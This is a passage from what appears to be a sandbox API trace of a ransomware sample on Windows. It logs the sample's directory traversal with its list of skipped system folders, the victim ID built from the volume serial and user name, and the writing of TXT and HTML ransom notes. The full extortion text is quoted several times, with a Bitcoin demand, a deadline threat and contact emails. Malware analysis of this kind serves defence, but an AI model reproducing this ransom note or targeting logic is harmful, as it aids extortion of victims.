FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0177.732] WriteFile (in: hFile=0xffffffff, lpBuffer=0x189b24, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0) returned 0
	[0177.733] CloseHandle (hObject=0xffffffff) returned 1
	[0177.733] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0177.733] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x189b0c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x189b0c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0177.733] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.734] GetUserNameA (in: lpBuffer=0x1899f0, pcbBuffer=0x189b08 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x189b08) returned 1
	[0177.735] wsprintfA (in: param_1=0x18a538, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0177.735] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\wwansvc\\profiles\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0177.735] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff
	[0177.735] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0177.735] WriteFile (in: hFile=0xffffffff, lpBuffer=0x18a538, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0) returned 0
	[0177.735] CloseHandle (hObject=0xffffffff) returned 1
	[0177.735] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\*.*" (normalized: "c:\\users\\all users\\microsoft\\wwansvc\\profiles\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0177.736] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\*.*") returned 49
	[0177.736] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.736] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\*.*", cchLength=0x31 | out: lpsz="c:\\users\\all users\\microsoft\\wwansvc\\profiles\\*.*") returned 0x31
	[0177.736] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.736] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\profiles\\*.*", lpSrch="windows") returned 0x0
	[0177.736] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.736] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\profiles\\*.*", lpSrch="boot") returned 0x0
	[0177.736] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.737] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\profiles\\*.*", lpSrch="system volume information") returned 0x0
	[0177.737] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.737] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\profiles\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0177.737] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.737] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\profiles\\*.*", lpSrch="temp") returned 0x0
	[0177.737] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.738] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\profiles\\*.*", lpSrch="program files") returned 0x0
	[0177.738] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.738] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\profiles\\*.*", lpSrch="program files (x86)") returned 0x0
	[0177.738] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.738] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\profiles\\*.*", lpSrch="appdata") returned 0x0
	[0177.738] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.738] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\profiles\\*.*", lpSrch="application data") returned 0x0
	[0177.739] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.739] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\profiles\\*.*", lpSrch="winnt") returned 0x0
	[0177.739] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.739] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\profiles\\*.*", lpSrch="tmp") returned 0x0
	[0177.739] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.739] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\profiles\\*.*", lpSrch="cache") returned 0x0
	[0177.739] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.740] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\profiles\\*.*", lpSrch="temporary internet files") returned 0x0
	[0177.740] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.740] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\profiles\\*.*", lpSrch="webcache") returned 0x0
	[0177.740] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.740] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\profiles\\*.*", lpSrch="inetcache") returned 0x0
	[0177.740] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.740] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\profiles\\*.*", lpSrch="nvidia") returned 0x0
	[0177.740] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.741] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\profiles\\*.*", lpSrch="packages") returned 0x0
	[0177.741] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.741] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\profiles\\*.*", lpSrch="cookies") returned 0x0
	[0177.741] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.741] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\profiles\\*.*", lpSrch="programdata") returned 0x0
	[0177.741] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0177.741] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0177.741] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0177.742] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0177.742] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0
	[0177.742] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0177.742] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0177.742] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Profiles", cAlternateFileName="")) returned 0
	[0177.743] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0177.743] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0177.743] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4ebc8954, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4ebc8954, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4ebc8954, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="XboxLive", cAlternateFileName="")) returned 1
	[0177.743] lstrcmpW (lpString1="XboxLive", lpString2="..") returned 1
	[0177.743] lstrcmpW (lpString1="XboxLive", lpString2=".") returned 1
	[0177.743] lstrcpyW (in: lpString1=0x18c29c, lpString2="C:\\Users\\All Users\\Microsoft" | out: lpString1="C:\\Users\\All Users\\Microsoft") returned="C:\\Users\\All Users\\Microsoft"
	[0177.743] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\") returned="C:\\Users\\All Users\\Microsoft\\"
	[0177.744] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\", lpString2="XboxLive" | out: lpString1="C:\\Users\\All Users\\Microsoft\\XboxLive") returned="C:\\Users\\All Users\\Microsoft\\XboxLive"
	[0177.744] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\Microsoft\\XboxLive" | out: lpString1="C:\\Users\\All Users\\Microsoft\\XboxLive") returned="C:\\Users\\All Users\\Microsoft\\XboxLive"
	[0177.744] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\XboxLive", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\XboxLive\\") returned="C:\\Users\\All Users\\Microsoft\\XboxLive\\"
	[0177.744] lstrcpyW (in: lpString1=0x18b384, lpString2="C:\\Users\\All Users\\Microsoft\\XboxLive\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\XboxLive\\") returned="C:\\Users\\All Users\\Microsoft\\XboxLive\\"
	[0177.744] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\XboxLive\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\XboxLive\\*.*") returned="C:\\Users\\All Users\\Microsoft\\XboxLive\\*.*"
	[0177.744] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\XboxLive\\*.*" (normalized: "c:\\users\\all users\\microsoft\\xboxlive\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4ebc8954, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4ebc8954, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4ebc8954, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0177.752] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\XboxLive\\*.*") returned 41
	[0177.752] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.753] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\XboxLive\\*.*", cchLength=0x29 | out: lpsz="c:\\users\\all users\\microsoft\\xboxlive\\*.*") returned 0x29
	[0177.753] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.753] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\*.*", lpSrch="windows") returned 0x0
	[0177.753] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.753] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\*.*", lpSrch="boot") returned 0x0
	[0177.753] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.753] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\*.*", lpSrch="system volume information") returned 0x0
	[0177.754] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.754] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0177.754] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.754] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\*.*", lpSrch="temp") returned 0x0
	[0177.754] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.754] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\*.*", lpSrch="program files") returned 0x0
	[0177.754] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.754] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\*.*", lpSrch="program files (x86)") returned 0x0
	[0177.755] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.755] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\*.*", lpSrch="appdata") returned 0x0
	[0177.755] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.755] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\*.*", lpSrch="application data") returned 0x0
	[0177.755] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.755] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\*.*", lpSrch="winnt") returned 0x0
	[0177.755] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.755] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\*.*", lpSrch="tmp") returned 0x0
	[0177.756] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.756] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\*.*", lpSrch="cache") returned 0x0
	[0177.756] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.756] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\*.*", lpSrch="temporary internet files") returned 0x0
	[0177.756] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.756] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\*.*", lpSrch="webcache") returned 0x0
	[0177.756] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.757] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\*.*", lpSrch="inetcache") returned 0x0
	[0177.757] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.757] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\*.*", lpSrch="nvidia") returned 0x0
	[0177.757] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.757] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\*.*", lpSrch="packages") returned 0x0
	[0177.757] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.757] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\*.*", lpSrch="cookies") returned 0x0
	[0177.758] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.758] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\xboxlive\\*.*", lpSrch="programdata") returned 0x0
	[0177.758] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4ebc8954, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4ebc8954, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4ebc8954, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0177.758] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4ebc8954, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4ebc8954, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4ebc8954, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NSALCache", cAlternateFileName="NSALCA~1")) returned 1
	[0177.758] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4ebc8954, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4ebc8954, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4ebc8954, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NSALCache", cAlternateFileName="NSALCA~1")) returned 0
	[0177.758] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0177.758] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0177.759] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\Microsoft\\XboxLive" | out: lpString1="C:\\Users\\All Users\\Microsoft\\XboxLive") returned="C:\\Users\\All Users\\Microsoft\\XboxLive"
	[0177.759] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\XboxLive", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\XboxLive\\*.*") returned="C:\\Users\\All Users\\Microsoft\\XboxLive\\*.*"
	[0177.759] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0177.759] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0177.759] wsprintfW (in: param_1=0x18b080, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\XboxLive\\HELP_DECRYPT_YOUR_FILES.TXT") returned 65
	[0177.759] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\XboxLive\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\xboxlive\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0177.762] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0177.762] WriteFile (in: hFile=0x384, lpBuffer=0x18a438*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18b35c, lpOverlapped=0x0 | out: lpBuffer=0x18a438*, lpNumberOfBytesWritten=0x18b35c*=0xc46, lpOverlapped=0x0) returned 1
	[0177.765] CloseHandle (hObject=0x384) returned 1
	[0177.766] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a408, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a408*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0177.766] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.766] GetUserNameA (in: lpBuffer=0x18a2ec, pcbBuffer=0x18a404 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a404) returned 1
	[0177.767] wsprintfW (in: param_1=0x18b288, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0177.767] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\XboxLive\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\xboxlive\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0177.768] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0177.768] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0177.768] WriteFile (in: hFile=0x384, lpBuffer=0x18b288*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18b364, lpOverlapped=0x0 | out: lpBuffer=0x18b288*, lpNumberOfBytesWritten=0x18b364*=0x30, lpOverlapped=0x0) returned 1
	[0177.768] CloseHandle (hObject=0x384) returned 1
	[0177.768] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0177.769] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0177.769] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0177.769] wsprintfW (in: param_1=0x18b040, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\XboxLive\\HELP_DECRYPT_YOUR_FILES.HTML") returned 66
	[0177.769] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\XboxLive\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\xboxlive\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0177.773] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0177.773] WriteFile (in: hFile=0x384, lpBuffer=0x18a834*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0x18a834*, lpNumberOfBytesWritten=0x18b358*=0x808, lpOverlapped=0x0) returned 1
	[0177.791] CloseHandle (hObject=0x384) returned 1
	[0177.792] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0177.792] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a81c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a81c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0177.793] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.793] GetUserNameA (in: lpBuffer=0x18a700, pcbBuffer=0x18a818 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a818) returned 1
